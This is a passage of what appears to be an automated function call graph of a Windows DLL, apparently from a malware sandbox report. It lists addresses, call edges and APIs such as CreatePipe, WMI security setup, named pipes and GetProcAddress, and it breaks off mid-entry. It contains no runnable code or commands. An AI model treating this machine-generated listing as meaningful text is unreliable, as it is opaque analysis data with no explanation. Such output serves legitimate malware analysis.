11589->11601 11605 10001778 11589->11605 11592 10001a44 11590->11592 11594 10009e66 3 API calls 11592->11594 11595 10001a50 11594->11595 11596 10001a6e 11595->11596 11638 100096ca 11595->11638 11598 1000861a 2 API calls 11596->11598 11597 10001b10 11599 1000861a 2 API calls 11597->11599 11598->11587 11599->11601 11600 10001ac3 11600->11597 11600->11601 11603 10001ad7 inet_ntoa lstrcpynA 11600->11603 11604 1000160d 7 API calls 11603->11604 11604->11600 11606 10009f95 3 API calls 11605->11606 11607 100017c0 11606->11607 11608 100017dd 11607->11608 11654 100016ee 11607->11654 11609 1000861a 2 API calls 11608->11609 11610 100017f3 11609->11610 11612 10001080 HeapAlloc 11610->11612 11613 100017fd 11612->11613 11614 1000a51a 2 API calls 11613->11614 11615 10001818 11614->11615 11616 100085c2 2 API calls 11615->11616 11617 10001826 11616->11617 11618 10001891 11617->11618 11619 10001080 HeapAlloc 11617->11619 11620 10001899 11618->11620 11653 10008604 HeapAlloc 11618->11653 11622 10001835 11619->11622 11620->11600 11623 10008910 3 API calls 11622->11623 11625 10001845 11623->11625 11624 100019e4 11627 1000861a 2 API calls 11624->11627 11626 100085c2 2 API calls 11625->11626 11629 10001852 11626->11629 11628 100019fa 11627->11628 11630 1000861a 2 API calls 11628->11630 11631 1000186e 11629->11631 11632 100016ee 3 API calls 11629->11632 11630->11620 11633 1000861a 2 API calls 11631->11633 11632->11631 11634 10001887 11633->11634 11635 10008cc0 4 API calls 11634->11635 11635->11618 11636 1001242d _ftol2_sse 11637 100018ac 11636->11637 11637->11624 11637->11636 11639 100096d6 11638->11639 11640 100096fb 11639->11640 11641 100096ef memset 11639->11641 11640->11596 11641->11640 11643 1000980c GetSystemTimeAsFileTime 11642->11643 11644 10001628 11643->11644 11645 1000980c GetSystemTimeAsFileTime 11644->11645 11646 10001630 11645->11646 11647 100098ee 6 API calls 11646->11647 11648 10001655 11647->11648 11649 1000980c GetSystemTimeAsFileTime 11648->11649 11650 100016a0 11648->11650 11652 1000165d 11648->11652 11649->11648 11651 1000984a 2 API calls 11650->11651 11651->11652 11652->11589 11653->11637 11656 1000170b 11654->11656 11655 10008698 3 API calls 11655->11656 11656->11655 11657 10001768 11656->11657 11657->11608 13424 1000f69b 13427 10008604 HeapAlloc 13424->13427 13426 1000f6ab 13427->13426 11935 1000131e 11936 10009ea5 3 API calls 11935->11936 11937 10001335 11936->11937 11938 10009e1f 3 API calls 11937->11938 11939 10001341 11938->11939 11940 10001366 11939->11940 11941 1001242d _ftol2_sse 11939->11941 11975 100011e7 11940->11975 11941->11940 11944 1000139b 11945 10009ed0 3 API calls 11946 100013b1 11945->11946 11947 1000147c 11946->11947 11982 1000763f 11946->11982 11949 1000a4ef 3 API calls 11947->11949 11951 10001493 11949->11951 11952 1000a5c6 4 API calls 11951->11952 11954 1000149f 11952->11954 11953 10001412 12156 1000a4ef 11953->12156 12183 1000748a 11954->12183 11955 10009ed0 3 API calls 11958 10001409 11955->11958 11958->11953 12005 1000636a 11958->12005 11961 1000861a 2 API calls 11961->11944 11962 100014f3 11969 1000110b 7 API calls 11962->11969 11972 100013d8 11962->11972 11963 100014dd 12212 1000110b lstrcmpA 11963->12212 11970 100014e9 11969->11970 12222 100010ba 11970->12222 11972->11961 11976 100095c7 HeapAlloc 11975->11976 11977 100011f8 11976->11977 11978 10009292 2 API calls 11977->11978 11979 10001214 11978->11979 11980 100085c2 2 API calls 11979->11980 11981 10001221 11980->11981 11981->11944 11981->11945 12230 1000ffa0 11982->12230 11984 1000765a 12234 1000821d 11984->12234 11986 10007670 11987 1000821d strncpy 11986->11987 11988 10007684 11987->11988 11989 1000821d strncpy 11988->11989 11990 1000769a 11989->11990 12238 10010a21 11990->12238 11992 100076a5 12004 100013cf 11992->12004 12243 100070ea 11992->12243 11994 100076d8 12003 100076df 11994->12003 12260 10007084 11994->12260 11995 1000861a 2 API calls 11996 1000771a 11995->11996 11997 1000861a 2 API calls 11996->11997 11999 10007725 11997->11999 12001 1000861a 2 API calls 11999->12001 12000 100076fe 12265 1000726d 12000->12265 12001->12004 12003->11995 12004->11953 12004->11955 12004->11972 12482 10008604 HeapAlloc 12005->12482 12007 10006380 12008 10009e66 3 API calls 12007->12008 12108 10006888 12007->12108 12009 10006395 12008->12009 12483 1000eb91 12009->12483 12014 100091e3 HeapAlloc 12015 100063b9 12014->12015 12016 100091e3 HeapAlloc 12015->12016 12017 100063cd 12016->12017 12018 100063f2 12017->12018 12019 100091e3 HeapAlloc 12017->12019 12020 100091e3 HeapAlloc 12018->12020 12019->12018 12021 10006417 12020->12021 12509 1000d8b8 12021->12509 12027 10006486 12028 100064ab 12027->12028 12556 10008604 HeapAlloc 12027->12556 12030 1000109a HeapAlloc 12028->12030 12032 100064da 12030->12032 12031 10006497 12031->12028 12034 1000ac3f memset 12031->12034 12033 1000109a HeapAlloc 12032->12033 12035 100064e8 12033->12035 12034->12028 12036 1000109a HeapAlloc 12035->12036 12037 100064f7 12036->12037 12038 1000109a HeapAlloc 12037->12038 12039 10006506 12038->12039 12040 1000109a HeapAlloc 12039->12040 12041 10006515 12040->12041 12042 1000109a HeapAlloc 12041->12042 12043 10006520 12042->12043 12044 10009640 2 API calls 12043->12044 12045 10006542 12044->12045 12046 1000109a HeapAlloc 12045->12046 12047 1000654c 12046->12047 12048 1000109a HeapAlloc 12047->12048 12049 1000655c 12048->12049 12050 1000109a HeapAlloc 12049->12050 12051 1000656b 12050->12051 12052 1000109a HeapAlloc 12051->12052 12053 1000657a 12052->12053 12054 1000109a HeapAlloc 12053->12054 12055 1000658a 12054->12055 12056 1000109a HeapAlloc 12055->12056 12057 1000659b 12056->12057 12557 1000a9b7 memset CreatePipe 12057->12557 12060 1000a9b7 8 API calls 12061 100065ba 12060->12061 12062 1000a9b7 8 API calls 12061->12062 12063 100065cb 12062->12063 12064 1000a9b7 8 API calls 12063->12064 12065 100065dc 12064->12065 12066 1000a9b7 8 API calls 12065->12066 12067 100065ed 12066->12067 12068 1000a9b7 8 API calls 12067->12068 12069 10006601 12068->12069 12070 1000a9b7 8 API calls 12069->12070 12071 10006612 12070->12071 12072 1000a9b7 8 API calls 12071->12072 12073 10006623 12072->12073 12074 1000a9b7 8 API calls 12073->12074 12075 10006634 12074->12075 12076 1000a9b7 8 API calls 12075->12076 12077 10006644 12076->12077 12078 1000a9b7 8 API calls 12077->12078 12079 10006654 12078->12079 12080 1000a9b7 8 API calls 12079->12080 12081 10006661 12080->12081 12082 100085d5 2 API calls 12081->12082 12083 10006670 12082->12083 12084 100085d5 2 API calls 12083->12084 12108->11953 12157 100095e1 HeapAlloc 12156->12157 12158 1000a4fe 12157->12158 12159 100085d5 2 API calls 12158->12159 12160 1000142e 12159->12160 12161 1000a5c6 12160->12161 12162 10009e1f 3 API calls 12161->12162 12163 1000a5d8 12162->12163 12164 1000980c GetSystemTimeAsFileTime 12163->12164 12165 1000143a 12164->12165 12166 1000773a 12165->12166 12658 1000f23f 12166->12658 12168 1000775a 12661 10007b14 12168->12661 12823 100090c1 12183->12823 12186 1000f23f GetTickCount 12187 100074d1 12186->12187 12829 100078e0 12187->12829 12189 100014d1 12189->11962 12189->11963 12190 100074f1 12190->12189 12191 100070ea 20 API calls 12190->12191 12192 10007521 12191->12192 12196 10007084 6 API calls 12192->12196 12211 10007528 12192->12211 12193 1000861a 2 API calls 12194 1000761f 12193->12194 12195 1000861a 2 API calls 12194->12195 12197 1000762a 12195->12197 12198 10007552 12196->12198 12199 1000861a 2 API calls 12197->12199 12198->12211 12868 10007302 12198->12868 12199->12189 12201 10007580 12201->12211 12881 100071b1 12201->12881 12205 100075cd 12902 10007a5d 12205->12902 12207 100075e0 12208 100070ea 20 API calls 12207->12208 12209 100075fe 12208->12209 12210 1000861a 2 API calls 12209->12210 12210->12211 12211->12193 12213 1000112e 12212->12213 12214 100096ca memset 12213->12214 12215 10001185 12213->12215 12216 1000114d 12214->12216 12215->11970 12217 1000980c GetSystemTimeAsFileTime 12216->12217 12218 10001162 12217->12218 12219 10009f48 4 API calls 12218->12219 12220 10001176 12219->12220 12221 10009f06 4 API calls 12220->12221 12221->12215 12223 100010c6 12222->12223 12224 100010da 12222->12224 12225 10009e66 3 API calls 12223->12225 12226 10009e66 3 API calls 12224->12226 12227 100010cd 12225->12227 12226->12227 12228 10009601 2 API calls 12227->12228 12229 100010fe 12228->12229 12229->11972 12231 1000ffa8 12230->12231 12233 1000ffaf 12231->12233 12268 10011648 12231->12268 12233->11984 12235 10008233 12234->12235 12237 1000822e 12234->12237 12281 10010080 12235->12281 12237->11986 12239 10010a30 12238->12239 12240 10010a35 12239->12240 12293 100109c5 12239->12293 12240->11992 12242 10010a4e 12242->11992 12343 10006fee 12243->12343 12245 1000710e 12246 10007195 12245->12246 12350 1000b462 12245->12350 12246->11994 12248 10007124 12249 10007159 12248->12249 12353 10006f09 12248->12353 12250 1000861a 2 API calls 12249->12250 12252 10007175 12250->12252 12253 1000861a 2 API calls 12252->12253 12254 10007180 12253->12254 12255 1000861a 2 API calls 12254->12255 12258 1000718b 12255->12258 12256 10007132 12256->12249 12361 1000e9d4 12256->12361 12258->12246 12259 1000861a 2 API calls 12258->12259 12259->12246 12261 1000b4a3 2 API calls 12260->12261 12262 1000709c 12261->12262 12263 100070bb 12262->12263 12264 10006f67 5 API calls 12262->12264 12263->12000 12264->12263 12425 10010b0e 12265->12425 12267 10007286 12267->12003 12269 10011659 12268->12269 12272 10011694 12268->12272 12270 100116a7 SwitchToThread 12269->12270 12271 1001166a 12269->12271 12270->12270 12270->12272 12271->12272 12276 100116b8 GetModuleHandleA 12271->12276 12272->12233 12274 10011677 12274->12272 12275 1001167c _time64 GetCurrentProcessId 12274->12275 12275->12272 12277 100116d7 GetProcAddress 12276->12277 12280 10011709 12276->12280 12278 100116ec GetProcAddress 12277->12278 12277->12280 12279 100116fb GetProcAddress 12278->12279 12278->12280 12279->12280 12280->12274 12280->12280 12282 100100b2 12281->12282 12283 1001008b 12281->12283 12282->12237 12283->12282 12285 100100c6 12283->12285 12286 100100f4 12285->12286 12287 100100d1 12285->12287 12286->12282 12287->12286 12289 10011c4a 12287->12289 12290 10011c62 12289->12290 12291 10011ce9 strncpy 12290->12291 12292 10011cb5 12290->12292 12291->12292 12292->12286 12294 100109d8 12293->12294 12296 100109f4 12294->12296 12297 100102b2 12294->12297 12296->12242 12298 100102e0 12297->12298 12316 100102f2 12297->12316 12299 100104b0 12298->12299 12300 1001039d 12298->12300 12301 1001037c 12298->12301 12302 1001031c 12298->12302 12303 1001034c 12298->12303 12298->12316 12306 10010a7b 2 API calls 12299->12306 12338 10010a7b _snprintf 12300->12338 12333 100107f7 12301->12333 12305 10010322 _snprintf 12302->12305 12321 10012122 12303->12321 12305->12316 12309 100104df 12306->12309 12311 10010561 12309->12311 12309->12316 12318 10010697 12309->12318 12310 100102b2 10 API calls 12313 100103ac 12310->12313 12314 100105a2 qsort 12311->12314 12311->12316 12312 100107f7 2 API calls 12312->12318 12313->12310 12313->12316 12314->12316 12320 100105cb 12314->12320 12315 100102b2 10 API calls 12315->12318 12316->12296 12317 100107f7 2 API calls 12317->12320 12318->12312 12318->12315 12318->12316 12319 100102b2 10 API calls 12319->12320 12320->12316 12320->12317 12320->12319 12322 1001212c 12321->12322 12323 1001212f _snprintf 12321->12323 12322->12323 12324 10012158 12323->12324 12332 100121c6 12323->12332 12325 10012161 localeconv 12324->12325 12324->12332 12326 10012181 strchr 12325->12326 12327 1001216e strchr 12325->12327 12329 100121b3 strchr 12326->12329 12330 1001218f strchr 12326->12330 12327->12326 12328 1001217e 12327->12328 12328->12326 12329->12332 12330->12329 12331 1001219d 12330->12331 12331->12329 12331->12332 12332->12316 12334 1001080d 12333->12334 12335 10010995 12334->12335 12336 10010910 _snprintf 12334->12336 12337 10010927 _snprintf 12334->12337 12335->12316 12336->12334 12337->12334 12340 10010a9c 12338->12340 12339 10010aa3 12339->12313 12340->12339 12341 10011c4a strncpy 12340->12341 12342 10010ab9 12341->12342 12342->12313 12365 10008604 HeapAlloc 12343->12365 12345 10007008 12346 100122d3 _ftol2_sse 12345->12346 12349 1000703d 12345->12349 12347 10007028 12346->12347 12366 10006f67 12347->12366 12349->12245 12375 10008604 HeapAlloc 12350->12375 12352 1000b487 12352->12248 12354 10006f1a 12353->12354 12355 1000902d _ftol2_sse 12354->12355 12356 10006f38 12355->12356 12376 10008604 HeapAlloc 12356->12376 12358 10006f43 12359 10006f5d 12358->12359 12360 10009601 2 API calls 12358->12360 12359->12256 12360->12359 12363 1000e9e8 12361->12363 12364 1000ea2e 12363->12364 12377 1000ea35 12363->12377 12364->12249 12365->12345 12367 10006f80 12366->12367 12368 10001080 HeapAlloc 12367->12368 12369 10006f8d lstrcpynA 12368->12369 12370 10006fab 12369->12370 12371 100085c2 2 API calls 12370->12371 12372 10006fb5 12371->12372 12373 10006fc7 memset 12372->12373 12374 10006fe8 12373->12374 12374->12349 12375->12352 12376->12358 12382 1000e668 memset memset 12377->12382 12380 1000ea84 12380->12363 12383 100095c7 HeapAlloc 12382->12383 12384 1000e6bd 12383->12384 12385 100095c7 HeapAlloc 12384->12385 12386 1000e6ca 12385->12386 12387 100095c7 HeapAlloc 12386->12387 12388 1000e6d7 12387->12388 12389 100095c7 HeapAlloc 12388->12389 12390 1000e6e4 12389->12390 12391 100095c7 HeapAlloc 12390->12391 12392 1000e6f1 memset 12391->12392 12405 1000e743 12392->12405 12393 1000e785 GetLastError 12393->12405 12394 1000e93e 12395 1000e971 GetLastError 12394->12395 12396 1000e97c 12394->12396 12397 1000e752 12394->12397 12395->12397 12398 10009749 2 API calls 12396->12398 12397->12380 12407 1000e4fa 12397->12407 12398->12397 12399 1000e81c GetLastError 12399->12405 12400 1000980c GetSystemTimeAsFileTime 12400->12405 12401 1000e86b GetLastError 12401->12405 12402 100095c7 HeapAlloc 12402->12405 12403 1000e8b4 GetLastError 12403->12405 12404 100085c2 2 API calls 12404->12405 12405->12393 12405->12394 12405->12397 12405->12399 12405->12400 12405->12401 12405->12402 12405->12403 12405->12404 12406 1000e903 GetLastError 12405->12406 12406->12405 12408 1000e539 12407->12408 12423 10008604 HeapAlloc 12408->12423 12410 1000e552 12417 1000e55b 12410->12417 12424 10008604 HeapAlloc 12410->12424 12412 1000861a 2 API calls 12419 1000e62e 12412->12419 12413 1000861a 2 API calls 12414 1000e646 12413->12414 12414->12380 12415 1000e608 GetLastError 12416 1000e614 12415->12416 12415->12417 12420 1000980c GetSystemTimeAsFileTime 12416->12420 12417->12412 12417->12419 12418 1000980c GetSystemTimeAsFileTime 12422 1000e56b 12418->12422 12419->12413 12419->12414 12420->12417 12421 10008698 3 API calls 12421->12422 12422->12415 12422->12417 12422->12418 12422->12419 12422->12421 12423->12410 12424->12422 12426 10010b61 12425->12426 12427 10010b1b 12425->12427 12426->12267 12427->12426 12430 1001122a 12427->12430 12429 10010b4e 12429->12267 12437 10010c21 12430->12437 12432 10011241 12436 10011268 12432->12436 12441 1001139e 12432->12441 12434 1001125f 12435 10010c21 8 API calls 12434->12435 12434->12436 12435->12436 12436->12429 12438 10010c33 12437->12438 12440 10010c6c 12438->12440 12451 10010dfa 12438->12451 12440->12432 12442 100113ff 12441->12442 12443 100113b5 12441->12443 12442->12434 12443->12442 12444 100113d1 12443->12444 12445 10011425 12443->12445 12447 10011414 12444->12447 12448 100113d6 12444->12448 12475 100111aa 12445->12475 12465 1001129b 12447->12465 12448->12442 12450 100113e7 memchr 12448->12450 12450->12442 12452 10010e14 12451->12452 12453 10010e7d 12452->12453 12455 10010ec8 12452->12455 12457 10010e36 12452->12457 12456 10010e8d _errno _strtoi64 _errno 12453->12456 12455->12457 12458 100121ff localeconv 12455->12458 12456->12457 12457->12440 12459 10012216 strchr 12458->12459 12460 10012229 _errno strtod 12458->12460 12459->12460 12463 10012225 12459->12463 12461 10012253 12460->12461 12462 10012262 _errno 12460->12462 12461->12462 12464 1001226e 12461->12464 12462->12464 12463->12460 12464->12457 12466 1000ffa0 7 API calls 12465->12466 12467 100112a7 12466->12467 12468 10010c21 8 API calls 12467->12468 12470 100112ca 12467->12470 12473 100112be 12468->12473 12469 100112ea memchr 12469->12470 12469->12473 12470->12442 12471 1001139e 17 API calls 12471->12473 12472 100100c6 strncpy 12472->12473 12473->12469 12473->12470 12473->12471 12473->12472 12474 10010c21 8 API calls 12473->12474 12474->12473 12476 100111b3 12475->12476 12477 10010c21 8 API calls 12476->12477 12478 100111ce 12476->12478 12480 100111c6 12477->12480 12478->12442 12479 1001139e 18 API calls 12479->12480 12480->12478 12480->12479 12481 10010c21 8 API calls 12480->12481 12481->12480 12482->12007 12484 10009601 2 API calls 12483->12484 12485 100063a0 12484->12485 12486 1000d804 12485->12486 12487 100095e1 HeapAlloc 12486->12487 12488 1000d819 12487->12488 12629 1000d523 CoInitializeEx CoInitializeSecurity CoCreateInstance 12488->12629 12491 100085d5 2 API calls 12492 1000d831 12491->12492 12493 100095e1 HeapAlloc 12492->12493 12508 100063a5 12492->12508 12494 1000d845 12493->12494 12495 100095e1 HeapAlloc 12494->12495 12496 1000d856 12495->12496 12636 1000d748 SysAllocString SysAllocString 12496->12636 12498 1000d867 12499 1000d895 12498->12499 12500 100091e3 HeapAlloc 12498->12500 12501 100085d5 2 API calls 12499->12501 12502 1000d876 VariantClear 12500->12502 12503 1000d89e 12501->12503 12502->12499 12505 100085d5 2 API calls 12503->12505 12506 1000d8a7 12505->12506 12642 1000d5d7 12506->12642 12508->12014 12510 100095e1 HeapAlloc 12509->12510 12511 1000d8cd 12510->12511 12512 1000d523 6 API calls 12511->12512 12513 1000d8d7 12512->12513 12514 100085d5 2 API calls 12513->12514 12515 1000d8e5 12514->12515 12516 100095e1 HeapAlloc 12515->12516 12531 10006459 12515->12531 12517 1000d8f9 12516->12517 12518 100095e1 HeapAlloc 12517->12518 12519 1000d90a 12518->12519 12520 1000d748 9 API calls 12519->12520 12521 1000d91b 12520->12521 12522 1000d949 12521->12522 12524 100091e3 HeapAlloc 12521->12524 12523 100085d5 2 API calls 12522->12523 12525 1000d952 12523->12525 12526 1000d92a VariantClear 12524->12526 12527 100085d5 2 API calls 12525->12527 12526->12522 12529 1000d95b 12527->12529 12530 1000d5d7 2 API calls 12529->12530 12530->12531 12532 1000d96c 12531->12532 12533 100095e1 HeapAlloc 12532->12533 12534 1000d981 12533->12534 12535 1000d523 6 API calls 12534->12535 12536 1000d98b 12535->12536 12537 100085d5 2 API calls 12536->12537 12538 1000d999 12537->12538 12539 100095e1 HeapAlloc 12538->12539 12554 10006461 12538->12554 12540 1000d9ad 12539->12540 12541 100095e1 HeapAlloc 12540->12541 12542 1000d9be 12541->12542 12543 1000d748 9 API calls 12542->12543 12544 1000d9cf 12543->12544 12545 1000d9fd 12544->12545 12546 100091e3 HeapAlloc 12544->12546 12547 100085d5 2 API calls 12545->12547 12549 1000d9de VariantClear 12546->12549 12548 1000da06 12547->12548 12550 100085d5 2 API calls 12548->12550 12549->12545 12552 1000da0f 12550->12552 12553 1000d5d7 2 API calls 12552->12553 12553->12554 12555 10008604 HeapAlloc 12554->12555 12555->12027 12556->12031 12558 1000aa22 CreatePipe 12557->12558 12572 100065a9 12557->12572 12559 1000aa39 12558->12559 12567 1000ab52 12558->12567 12647 10008604 HeapAlloc 12559->12647 12561 1000861a 2 API calls 12561->12572 12562 10009292 2 API calls 12564 1000aa69 12562->12564 12563 100091a6 HeapAlloc 12563->12564 12564->12562 12564->12563 12565 1000861a 2 API calls 12564->12565 12566 1000ab18 12564->12566 12564->12567 12564->12572 12565->12564 12566->12567 12568 10009256 2 API calls 12566->12568 12567->12561 12569 1000ab3b 12568->12569 12569->12567 12570 1000ab41 12569->12570 12571 1000861a 2 API calls 12570->12571 12571->12572 12572->12060 12630 1000d568 SysAllocString 12629->12630 12633 1000d5a5 12629->12633 12631 1000d583 12630->12631 12632 1000d587 CoSetProxyBlanket 12631->12632 12631->12633 12632->12633 12634 1000d59e 12632->12634 12633->12491 12646 10008604 HeapAlloc 12634->12646 12637 100095e1 HeapAlloc 12636->12637 12638 1000d773 SysAllocString 12637->12638 12639 100085d5 2 API calls 12638->12639 12640 1000d786 SysFreeString SysFreeString SysFreeString 12639->12640 12640->12498 12643 1000d5e2 12642->12643 12644 1000861a 2 API calls 12643->12644 12645 1000d5ff 12644->12645 12645->12508 12646->12633 12647->12564 12659 1000f25f GetTickCount 12658->12659 12660 1000f24e __aulldiv 12658->12660 12659->12168 12660->12168 12662 1000ffa0 7 API calls 12661->12662 12663 10007b24 12662->12663 12664 1000821d strncpy 12663->12664 12665 10007b3d 12664->12665 12666 1000821d strncpy 12665->12666 12667 10007b51 12666->12667 12668 1000821d strncpy 12667->12668 12669 10007b62 12668->12669 12670 1000821d strncpy 12669->12670 12671 10007b73 12670->12671 12672 1000821d strncpy 12671->12672 12673 10007b89 12672->12673 12674 1000821d strncpy 12673->12674 12675 10007b9d 12674->12675 12676 1000821d strncpy 12675->12676 12677 10007bb6 12676->12677 12678 1000821d strncpy 12677->12678 12679 10007bca 12678->12679 12680 1000821d strncpy 12679->12680 12681 10007bde 12680->12681 12682 1000821d strncpy 12681->12682 12683 10007bf2 12682->12683 12684 1000821d strncpy 12683->12684 12685 10007c08 12684->12685 12686 1000821d strncpy 12685->12686 12687 10007c1f 12686->12687 12811 10008279 12687->12811 12690 1000821d strncpy 12691 10007c32 12690->12691 12692 1000821d strncpy 12691->12692 12693 10007c46 12692->12693 12694 1000821d strncpy 12693->12694 12695 10007c5a 12694->12695 12696 10008279 5 API calls 12695->12696 12697 10007c62 12696->12697 12698 1000821d strncpy 12697->12698 12699 10007c6d 12698->12699 12700 10008279 5 API calls 12699->12700 12701 10007c75 12700->12701 12702 1000821d strncpy 12701->12702 12703 10007c80 12702->12703 12704 10008279 5 API calls 12703->12704 12705 10007c88 12704->12705 12706 1000821d strncpy 12705->12706 12707 10007c93 12706->12707 12708 1000821d strncpy 12707->12708 12709 10007ca7 12708->12709 12710 10008279 5 API calls 12709->12710 12711 10007caf 12710->12711 12712 1000821d strncpy 12711->12712 12713 10007cba 12712->12713 12714 1000821d strncpy 12713->12714 12715 10007cd4 12714->12715 12716 10008279 5 API calls 12715->12716 12717 10007cdc 12716->12717 12718 1000821d strncpy 12717->12718 12719 10007ce7 12718->12719 12720 1000821d strncpy 12719->12720 12721 10007cfb 12720->12721 12722 1000821d strncpy 12721->12722 12723 10007d0f 12722->12723 12724 10008279 5 API calls 12723->12724 12725 10007d20 12724->12725 12726 1000821d strncpy 12725->12726 12727 10007d2b 12726->12727 12728 1000821d strncpy 12727->12728 12729 10007d3f 12728->12729 12730 1000821d strncpy 12729->12730 12731 10007d53 12730->12731 12732 10008279 5 API calls 12731->12732 12733 10007d5e 12732->12733 12734 1000821d strncpy 12733->12734 12735 10007d69 12734->12735 12736 10008279 5 API calls 12735->12736 12737 10007d77 12736->12737 12738 1000821d strncpy 12737->12738 12739 10007d82 12738->12739 12740 10008279 5 API calls 12739->12740 12741 10007d8d 12740->12741 12742 1000821d strncpy 12741->12742 12812 10007c27 12811->12812 12813 1000828a WideCharToMultiByte 12811->12813 12812->12690 12813->12812 12814 100082a4 12813->12814 12822 10008604 HeapAlloc 12814->12822 12816 100082ae 12816->12812 12817 100082b8 WideCharToMultiByte 12816->12817 12818 100082d1 12817->12818 12820 100082df 12817->12820 12819 1000861a 2 API calls 12818->12819 12819->12812 12821 1000861a 2 API calls 12820->12821 12821->12812 12822->12816 12824 100090cf 12823->12824 12825 1001242d _ftol2_sse 12824->12825 12826 10009119 12825->12826 12827 100074cc 12826->12827 12828 1001242d _ftol2_sse 12826->12828 12827->12186 12828->12826 12830 1000ffa0 7 API calls 12829->12830 12831 100078ef 12830->12831 12832 1000821d strncpy 12831->12832 12833 10007905 12832->12833 12834 1000821d strncpy 12833->12834 12835 1000791a 12834->12835 12836 1000821d strncpy 12835->12836 12837 1000792e 12836->12837 12838 1000821d strncpy 12837->12838 12839 10007943 12838->12839 12840 1000821d strncpy 12839->12840 12841 10007954 12840->12841 12842 1000821d strncpy 12841->12842 12843 1000796d 12842->12843 12844 1000821d strncpy 12843->12844 12845 10007983 12844->12845 12846 1000821d strncpy 12845->12846 12847 10007994 12846->12847 12848 1000821d strncpy 12847->12848 12849 100079a8 12848->12849 12850 1000821d strncpy 12849->12850 12851 100079bb 12850->12851 12852 1000821d strncpy 12851->12852 12853 100079cf 12852->12853 12854 1000821d strncpy 12853->12854 12855 100079ee 12854->12855 12856 10008279 5 API calls 12855->12856 12857 100079ff 12856->12857 12858 1000821d strncpy 12857->12858 12859 10007a0a 12858->12859 12860 10008279 5 API calls 12859->12860 12861 10007a1b 12860->12861 12862 1000821d strncpy 12861->12862 12863 10007a26 12862->12863 12864 1000821d strncpy 12863->12864 12865 10007a42 12864->12865 12866 10010a21 12 API calls 12865->12866 12867 10007a4a 12866->12867 12867->12190 12869 10010b0e 18 API calls 12868->12869 12870 10007320 12869->12870 12871 100096ca memset 12870->12871 12874 1000732c 12870->12874 12872 10007360 12871->12872 12872->12874 12921 10008604 HeapAlloc 12872->12921 12874->12201 12875 10007458 12877 1000861a 2 API calls 12875->12877 12879 10007469 12875->12879 12876 10007404 12876->12874 12876->12875 12878 100091a6 HeapAlloc 12876->12878 12877->12875 12878->12876 12880 1000861a 2 API calls 12879->12880 12880->12874 12882 100071c8 12881->12882 12883 1000b4a3 2 API calls 12882->12883 12884 1000725e 12882->12884 12885 100071e4 12883->12885 12884->12211 12895 1000118e 12884->12895 12885->12884 12886 10007233 12885->12886 12922 10008604 HeapAlloc 12885->12922 12888 1000861a 2 API calls 12886->12888 12890 10007254 12888->12890 12889 10007201 12889->12886 12892 10009601 2 API calls 12889->12892 12891 1000861a 2 API calls 12890->12891 12891->12884 12893 10007220 12892->12893 12923 100082fe 12893->12923 12896 1000110b 7 API calls 12895->12896 12897 1000119f 12896->12897 12898 100011b0 memset 12897->12898 12899 100011ac 12897->12899 12900 10001da0 6 API calls 12898->12900 12899->12205 12901 100011d2 12900->12901 12901->12205 12903 1000ffa0 7 API calls 12902->12903 12904 10007a6c 12903->12904 12905 1000821d strncpy 12904->12905 12906 10007a82 12905->12906 12907 1000821d strncpy 12906->12907 12908 10007a96 12907->12908 12909 1000821d strncpy 12908->12909 12910 10007aa7 12909->12910 12911 1000821d strncpy 12910->12911 12912 10007ab8 12911->12912 12913 1000821d strncpy 12912->12913 12914 10007acd 12913->12914 12915 1000821d strncpy 12914->12915 12916 10007ae3 12915->12916 12917 1000821d strncpy 12916->12917 12918 10007af9 12917->12918 12919 10010a21 12 API calls 12918->12919 12920 10007b01 12919->12920 12920->12207 12921->12876 12922->12889 12930 10008604 HeapAlloc 12923->12930 12925 1000849e 12925->12886 12926 10008380 GetLastError 12929 1000840a 12926->12929 12927 1000861a 2 API calls 12927->12925 12928 1000832a 12928->12925 12928->12926 12928->12929 12929->12927 12930->12928 13447 100032a1 13459 100032b7 13447->13459 13448 100032d0 GetLastError 13449 100034c2 13448->13449 13448->13459 13450 100034a8 GetLastError 13451 100034ae DisconnectNamedPipe 13450->13451 13451->13449 13451->13459 13452 100093be HeapAlloc 13452->13459 13453 100096ca memset 13453->13459 13455 10009749 SetLastError SetLastError 13455->13459 13456 10001da0 6 API calls 13456->13459 13457 1000c319 HeapAlloc HeapFree memset FlushFileBuffers 13457->13459 13458 100091a6 HeapAlloc 13458->13459 13459->13448 13459->13450 13459->13451 13459->13452 13459->13453 13459->13455 13459->13456 13459->13457 13459->13458 13460 100094b7 2 API calls 13459->13460 13461 10008604 HeapAlloc 13459->13461 13460->13459 13461->13459 12988 10002027 12989 10002064 12988->12989 12990 10002057 12988->12990 12991 1000902d _ftol2_sse 12989->12991 13009 1000206e 12989->13009 13017 1000933a 12990->13017 12993 10002093 12991->12993 12994 1000b4a3 2 API calls 12993->12994 12995 100020ab 12994->12995 12996 10009256 2 API calls 12995->12996 13004 100020b2 12995->13004 12998 100020c1 12996->12998 12997 1000861a 2 API calls 12999 10002200 12997->12999 13024 1000b27d memset 12998->13024 13001 1000861a 2 API calls 12999->13001 13002 1000220b 13001->13002 13003 1000861a 2 API calls 13002->13003 13012 10002217 13003->13012 13004->12997 13005 1000223f 13007 100094b7 2 API calls 13005->13007 13006 100092e5 HeapAlloc lstrcatW 13016 100020cc 13006->13016 13007->13009 13008 10002234 13011 1000861a 2 API calls 13008->13011 13010 1000861a 2 API calls 13010->13012 13011->13005 13012->13005 13012->13008 13012->13010 13013 1000861a HeapFree memset 13013->13016 13014 100091e3 HeapAlloc 13014->13016 13015 1000a911 memset GetExitCodeProcess 13015->13016 13016->13004 13016->13006 13016->13013 13016->13014 13016->13015 13019 10009351 13017->13019 13039 10008604 HeapAlloc 13019->13039 13020 10009392 lstrcatA 13022 10009387 13020->13022 13023 100093a6 lstrcatA 13020->13023 13021 100093b7 13021->12989 13022->13020 13022->13021 13023->13022 13040 10008604 HeapAlloc 13024->13040 13026 1000b2a4 13027 100091e3 HeapAlloc 13026->13027 13038 1000b328 13026->13038 13028 1000b2c2 13027->13028 13029 100091e3 HeapAlloc 13028->13029 13030 1000b2d5 13029->13030 13031 100091e3 HeapAlloc 13030->13031 13032 1000b2e9 13031->13032 13033 100095e1 HeapAlloc 13032->13033 13034 1000b2f6 13033->13034 13035 100085d5 2 API calls 13034->13035 13036 1000b31c 13035->13036 13037 100091e3 HeapAlloc 13036->13037 13037->13038 13038->13016 13039->13022 13040->13026 13107 10005431 13108 1000950e 3 API calls 13107->13108 13109 10005449 13108->13109 13125 10005531 13109->13125 13126 10008604 HeapAlloc 13109->13126 13111 10005460 13112 100095c7 HeapAlloc 13111->13112 13111->13125 13113 10005478 13112->13113 13114 